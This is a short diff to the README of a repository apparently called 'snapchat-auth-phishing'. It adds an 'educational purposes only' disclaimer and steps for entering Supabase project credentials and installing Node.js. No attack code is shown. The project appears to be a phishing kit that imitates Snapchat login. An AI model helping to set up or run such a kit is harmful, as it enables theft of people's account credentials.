neepan/snapchat-auth-phishing/README.md

 ## NOTE: THIS REPO SHOULD BE USED ONLY FOR EDUCATIONAL PURPOSES

+## ADD YOUR SUPABASE CREDENTIALS

+- /supabase/config.toml -> add your project id from supabase
+- /src/integration/supabase -> add your supabase url and key

 The only requirement is having Node.js & npm installed - [install with nvm](https://github.com/nvm-sh/nvm#installing-and-updating)

 Follow these steps: